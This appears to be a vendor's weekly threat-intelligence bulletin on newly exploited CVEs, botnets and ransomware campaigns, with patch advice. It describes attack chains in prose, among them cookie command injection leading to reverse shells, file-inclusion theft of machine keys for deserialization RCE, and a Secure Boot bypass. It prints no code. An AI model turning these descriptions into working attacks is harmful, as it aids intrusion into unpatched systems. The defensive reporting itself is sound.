The week saw a surge in cyber threat activity, with CISA adding six new vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, including two Microsoft Windows zero-days and one each affecting Adobe, IGEL, Rapid7, and SKYSEA.  

Active exploitation was also observed in ICTBroadcast, Gladinet CentreStack, Triofox, and Oracle E-Business Suite, where attackers leveraged unauthenticated remote code execution and data access flaws.  

Botnet operations escalated worldwide, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st exploiting weaknesses in GitLab, cloud gateways, and PHP applications. IoT-focused botnets like Mirai, Bashlite, Tsunami, and BrickerBot intensified targeting of EirD1000 routers to maintain persistence and lateral movement across networks.

In malware and targeted threat activity, Cisco Talos reported that threat actor Storm-2603 is exploiting outdated Velociraptor builds to deploy multi-ransomware attacks involving Warlock, LockBit, and Babuk against VMware ESXi and Windows servers. Meanwhile, Trend Micro identified the RondoDox botnet exploiting TP-Link router flaws, and SecureWorks linked the SKYSEA Client View vulnerability to the Bronze Butler (Tick) espionage group targeting Japanese organizations.

Key points

• 6 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.  

• 3 additional vulnerabilities were confirmed as actively exploited in the wild during the week.  

• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  

• 3 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.  

• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-2611
An Improper Input Validation vulnerability in ICTBroadcast affects versions 7.4 and below, allowing unauthenticated remote code execution through command injection in the BROADCAST cookie. According to VulnCheck, this flaw is actively exploited in the wild, with attacks observed in two phases a time-based exploit check followed by reverse shell deployment using Base64-encoded payloads. Around 200 internet-facing instances remain exposed, and overlaps with prior Fortinet-documented activity suggest possible tool reuse. The patch status for this vulnerability remains undisclosed, and VulnCheck has released Snort and Suricata signatures to aid in detection and mitigation.  

CVE-2025-6264
An Incorrect Defaults Permission vulnerability in the Rapid7 Velociraptor, an open-source DFIR and endpoint monitoring tool, affects versions prior to 0.74.3 and can lead to arbitrary command execution and full endpoint takeover. According to Rapid7, insufficient permission checks in theAdmin.Client.UpdateClientConfig Artifact allow users with COLLECT_CLIENT privileges to update client configurations and execute arbitrary commands. Cisco Talos observed threat actors exploiting outdated Velociraptor builds (notably 0.73.4.0) in ransomware operations deploying Warlock, LockBit, and Babuk payloads. The attackers used Velociraptor for persistence, privilege escalation, and stealthy data exfiltration. This vulnerability was patched in version 0.74.3, and Rapid7 recommends upgrading immediately and restricting Artifact permissions to mitigate abuse. The flaw has also been added to the CISA KEV catalog.

CVE-2025-11371
A Local File Inclusion vulnerability in Gladinet CentreStack and Triofox up to version 16.7.10368.56560, allows unauthorized disclosure of system files. According to Huntress, attackers are exploiting this flaw to read sensitive files like Web.config and extract the machine key, chaining it with a prior ViewState deserialization bug (CVE-2025-30406) to achieve remote code execution. Exploitation has already been observed in multiple environments, and since no official patch is available, Huntress recommends disabling the “temp” handler in the UploadDownloadProxy component as a temporary mitigation.

CVE-2025-24990
An Untrusted Pointer Dereference vulnerability in Microsoft Windows allows local privilege escalation and was remediated in Microsoft October 2025 Patch Tuesday updates. The flaw exists in the legacy Agere Modem Driver, a component that enables communication with Agere/LSI dail-up and fax modems, and Microsoft removed the vulnerable driver in the cumulative update. The issue affects all supported Windows versions and can be exploited even when the modem is not in use, so administrators must apply the cumulative update immediately and verify removal of the Agere driver on the affected hosts. This vulnerability was actively exploited as a zero-day and has been added to the CISA KEV catalog.

CVE-2025-47827

A Use-of-Key-Past-Expiration vulnerability in IGEL OS (versions prior to v11) allows a Secure Boot bypass by failing to validate the cryptographic signature of a SquashFS root filesystem. The vulnerable igel-flash-driver permits mounting of a crafted SquashFS image, enabling an attacker to boot a signed Shim, load a vulnerable kernel, and replace the running kernel via kexec_load, effectively breaking the chain of trust. Successful exploitation enables stealthy bootkits or kernel-level rootkits, leading to code execution, privilege escalation, denial of service, and data exposure. IGEL publishes a security notice in June 2025 and Microsoft issues a related fix in the October 2025 Patch Tuesday updates; defenders must apply vendor updates, restrict physical and local admin access, and validate firmware and boot configurations. This issue is added to the CISA KEV catalog.

CVE-2025-54253
A Code Execution vulnerability in Adobe Experience Manager Forms on JEE affecting 6.5.23 and earlier allows unauthenticated arbitrary code execution without user interaction, with the vulnerability’s scope changed to enable remote exploitation. Adobe released a fix in 6.5.0-0108 to remediate the issue. A public proof-of-concept is available and the flaw has been added to the CISA KEV catalog, so affected deployments should apply the patch immediately and audit for signs of compromise.

CVE-2025-59230  
An Improper Access Control vulnerability in the Microsoft Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally to SYSTEM. The flaw, which affects the Windows service responsible for managing VPN and remote-access connections, arises from improper validation of user commands, enabling privilege escalation through crafted inputs. Microsoft addressed the issue in its October 2025 Patch Tuesday updates by correcting the access-control checks. While exploitation requires some preparatory effort, experts note that the attack is relatively easy to execute even by moderately skilled threat actors. This vulnerability was actively exploited as a zero-day and has been added to the CISA KEV catalog.  

CVE-2025-61884
A pre-authentication Server-Side Request Forgery vulnerability in Oracle E-Business Suite Configurator affecting 12.2.3–12.2.14 permits an unauthenticated HTTP attacker to retrieve or manipulate sensitive configuration data. Oracle issues an emergency patch that validates the return_url with a strict regular expression to block injected CRLF sequences and mitigate the exploit. A public proof-of-concept for the flaw is leaked by the ShinyHunters extortion group, increasing exploitation risk. Immediate application of the Oracle update and review of exposed EBS instances are strongly advised.

CVE-2016-7836
An Improper Authentication vulnerability in SKYSEA Client View affecting versions 11.221.03 and earlier permits unauthenticated remote code execution against the management console TCP interface. SecureWorks and vendor advisories document active exploitation beginning in 2016-2017 and link the flaw to espionage campaigns targeting Japanese organizations, attributed to threat actors tracked as BRONZE BUTLER/Tick. SKYSEA remediated the issue in version 11.300.08h, and the vulnerability was later added to the CISA KEV catalog.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.  

Malware section

CVE-2025-6264
According to Cisco Talos, threat actor Storm-2603 leverages outdated Velociraptor builds to maintain persistent access and orchestrate multi-ransomware campaigns deploying Warlock, LockBit, and Babuk against VMware ESXi hosts and Windows servers. Indicators include installation of Velociraptor on multiple servers, execution of SMB-based remote commands, creation of admin accounts synced to Entra ID, modification of Group Policy Objects, and execution of fileless PowerShell encryptors. The actor also uses Velociraptor to run developer tools like Visual Studio Code to establish tunnels to attacker-controlled C2 infrastructure and exfiltrate data while evading detection. Talos assesses the campaign aligns with Storm-2603 TTPs and urges patching, artifact permission hardening, and forensic review of Velociraptor deployments.

CVE-2023-1389
Trend Micro's recent analysis revealed the Rondodox botnet campaign and identified its use of known router flaws to gain initial access, including exploitation of a TP‑Link Archer vulnerability, CVE‑2023‑1389. RondoDox operates as an “exploit shotgun,” chaining longstanding command‑injection bugs across routers, DVRs, NVRs and CCTV devices to obtain shell access and deploy multi‑architecture payloads. FortiGuard Labs’ initial investigation noted early waves targeting TBK DVRs and Four‑Faith routers by leveraging vulnerabilities such as CVE‑2024‑3721 and CVE‑2024‑12856, illustrating the campaign’s breadth and opportunistic approach.

CVE-2016-7836
According to SecureWorks, the SKYSEA Client View vulnerability has been linked to espionage campaigns targeting Japanese organizations, with investigations attributing these attacks to the threat actor group Bronze Butler, also known as Tick. This cyber-espionage group primarily focuses on Japanese government, defense, and industrial sectors, conducting persistent, intelligence-driven operations. Bronze Butler leverages custom malware, credential theft, and lateral movement techniques to gain access, exfiltrate sensitive data, and maintain long-term presence within compromised networks.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

The escalation in multi-vector exploits and malware campaigns this week reflects how quickly attackers adapt to newly disclosed flaws and misconfigurations. From botnets exploiting IoT routers to advanced threat actors targeting enterprise platforms, the pace of exploitation continues to accelerate. Strengthening patch management, tightening access controls, and leveraging real-time vulnerability intelligence are key to staying resilient. Loginsoft Vulnerability Intelligence (LOVI) empowers defenders with the visibility and context needed to anticipate threats before they escalate.